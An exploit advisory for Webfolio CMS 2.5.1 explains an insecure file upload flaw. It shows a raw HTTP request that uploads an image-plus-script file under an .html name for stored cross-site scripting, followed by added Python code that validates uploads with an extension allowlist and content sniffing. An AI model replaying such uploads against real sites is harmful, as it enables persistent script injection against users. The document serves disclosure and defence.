Webfolio CMS version 2.5.1 suffers from an insecure file upload vulnerability.
89b7b64d987ea801fc593ca99caa022a573667c732c049a833b14739d428551f
# Exploit Title: Insecure File Upload in webfolio2.5.1
# Date: 04 August 2015
# Exploit Author: Sharankumar Somana
# Vendor Homepage: http://webfolio-cms.sourceforge.net/
# Software Link: http://sourceforge.net/projects/webfolio-cms/?source=typ_redirect
# Version: 2.5.1
# Tested on: Windows 7
_________________________________________________________________________________________________________________________
Insecure File Upload
Webfolio CMS is vulnerable to an insecure file upload vulnerability. The application checks the size and content type of files while uploading, but it fails to check the extension of the uploaded file. A malicious user can upload a valid image file with JavaScript embedded in it under a changed .html extension. An attacker can take advantage of this issue to perform persistent cross-site scripting attacks.
Raw Request:
POST /webfolio/wfcms2/admin/users/edit/1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://localhost/webfolio/wfcms2/admin/users/edit/1
Cookie: PHPSESSID=fp7drdbohoi5v1ni242iuoq303;
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------17740215416001
Content-Length: 123677

-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[username]"

admin
-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[password]"


-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[passwdConfirm]"


-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[email]"

sharan@gmail.com
-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[role]"

10
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[realName]"

sharan
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[aboutText]"

testing 123
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[dateOfBirth]"

1990-08-04
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[picture]"; filename="test.html"
Content-Type: image/jpeg

Valid image file data followed by javascript code
<html>
<script>alert(1)</script>
</html>
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[picture][current_file_name]"

php1678_55bfc11748cdf.html
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[timeZone]"

UTC
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[website]"


-----------------------------17740215416001
Content-Disposition: form-data; name="_csrf"

af184c6a94f8485fae50c8e5bc320695
-----------------------------17740215416001
Content-Disposition: form-data; name="btnSave"

Save changes
-----------------------------17740215416001--
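The description and request above show why a size check plus the client-declared Content-Type is not enough: the picture part carries real JPEG bytes and says image/jpeg, so only the filename extension gives the upload away. The following is an added example written for this page, in Python rather than Webfolio's own PHP, and is not the project's code. It parses a multipart body of the same shape, applies the two checks the advisory says are missing (an extension allowlist and a content sniff against image signatures) alongside the existing ones, and derives the stored filename on the server. The boundary is the one in the capture; the request bodies, the JPEG header bytes and the 512 KiB limit are constructed assumptions.

```python
"""Server-side profile-picture validation (added example, not Webfolio code).
Checks the advisory says 2.5.1 performs: size and declared content type.
Checks it says are missing: extension allowlist, content sniff, server-chosen name."""
import re
import secrets
from dataclasses import dataclass
from typing import Optional

BOUNDARY = b"---------------------------17740215416001"  # boundary from the capture above

# Leading bytes of the only image formats a profile picture may be.
IMAGE_SIGNATURES = {
    b"\xff\xd8\xff": ("image/jpeg", "jpg"),
    b"\x89PNG\r\n\x1a\n": ("image/png", "png"),
    b"GIF87a": ("image/gif", "gif"),
    b"GIF89a": ("image/gif", "gif"),
}
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
MAX_BYTES = 512 * 1024  # assumed limit; the advisory gives no number


@dataclass
class Part:
    name: str
    filename: Optional[str]
    content_type: Optional[str]
    data: bytes


def parse_multipart(body: bytes, boundary: bytes) -> list:
    """Minimal multipart/form-data parser, enough for a form like the one above."""
    parts = []
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter reached
        header_blob, _, data = chunk[2:].partition(b"\r\n\r\n")  # drop leading CRLF
        if data.endswith(b"\r\n"):
            data = data[:-2]  # CRLF that precedes the next delimiter
        headers = {}
        for line in header_blob.split(b"\r\n"):
            key, _, value = line.decode("latin-1").partition(":")
            headers[key.strip().lower()] = value.strip()
        disp = headers.get("content-disposition", "")
        name = re.search(r'name="([^"]*)"', disp)
        fname = re.search(r'filename="([^"]*)"', disp)
        parts.append(Part(name.group(1) if name else "",
                          fname.group(1) if fname else None,
                          headers.get("content-type"), data))
    return parts


def picture_part(body: bytes) -> Optional[Part]:
    for part in parse_multipart(body, BOUNDARY):
        if part.name == "UserProfile[picture]":
            return part
    return None


def check_upload(part: Optional[Part]):
    """Return (accepted, detail): a rejection reason, or on success the
    server-chosen extension the file will be stored under."""
    if part is None or part.filename is None:
        return False, "no file part"
    if len(part.data) > MAX_BYTES:
        return False, "file too large"
    ext = part.filename.rsplit(".", 1)[-1].lower() if "." in part.filename else ""
    if ext not in ALLOWED_EXTENSIONS:          # the check Webfolio 2.5.1 lacks
        return False, f"extension '.{ext}' not allowed"
    detected = next((v for sig, v in IMAGE_SIGNATURES.items()
                     if part.data.startswith(sig)), None)
    if detected is None:                       # content sniff, independent of the header
        return False, "content is not a recognised image"
    if part.content_type != detected[0]:
        return False, "declared Content-Type does not match content"
    return True, detected[1]


def stored_name(ext: str) -> str:
    """Server-generated name: the client's filename never reaches the disk."""
    return f"{secrets.token_hex(8)}.{ext}"


def build_body(filename: str, content_type: str, data: bytes) -> bytes:
    """Constructed two-field form in the shape of the advisory's request."""
    return (b"--" + BOUNDARY + b"\r\n"
            b'Content-Disposition: form-data; name="UserAccountInfo[username]"\r\n\r\n'
            b"admin\r\n"
            b"--" + BOUNDARY + b"\r\n"
            b'Content-Disposition: form-data; name="UserProfile[picture]"; '
            b'filename="' + filename.encode() + b'"\r\n'
            b"Content-Type: " + content_type.encode() + b"\r\n\r\n"
            + data + b"\r\n"
            b"--" + BOUNDARY + b"--\r\n")


JPEG_HEAD = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"  # constructed start of a JPEG file
# 1. The advisory's case: genuine image bytes plus script, sent under an .html name.
ADVISORY_UPLOAD = build_body("test.html", "image/jpeg",
                             JPEG_HEAD + b"<html><script>alert(1)</script></html>")
# 2. A benign picture.
GOOD_UPLOAD = build_body("me.jpg", "image/jpeg", JPEG_HEAD + b"\x00" * 64)
# 3. HTML content hiding behind an image extension and image Content-Type.
SPOOFED_UPLOAD = build_body("me.jpg", "image/jpeg", b"<html><script>alert(1)</script></html>")

if __name__ == "__main__":
    for label, body in [("advisory", ADVISORY_UPLOAD), ("good", GOOD_UPLOAD),
                        ("spoofed", SPOOFED_UPLOAD)]:
        ok, detail = check_upload(picture_part(body))
        print(label, "stored as " + stored_name(detail) if ok else "rejected: " + detail)
```

Run as a script, the first and third bodies are rejected (by the extension allowlist and the content sniff respectively) and only the second is accepted and given a random `.jpg` name. The extension check is what stops the advisory's request, since its bytes really do start like a JPEG; the sniff catches the opposite trick. Serving stored pictures from a location that does not execute scripts, with a server-set Content-Type, closes the remaining gap.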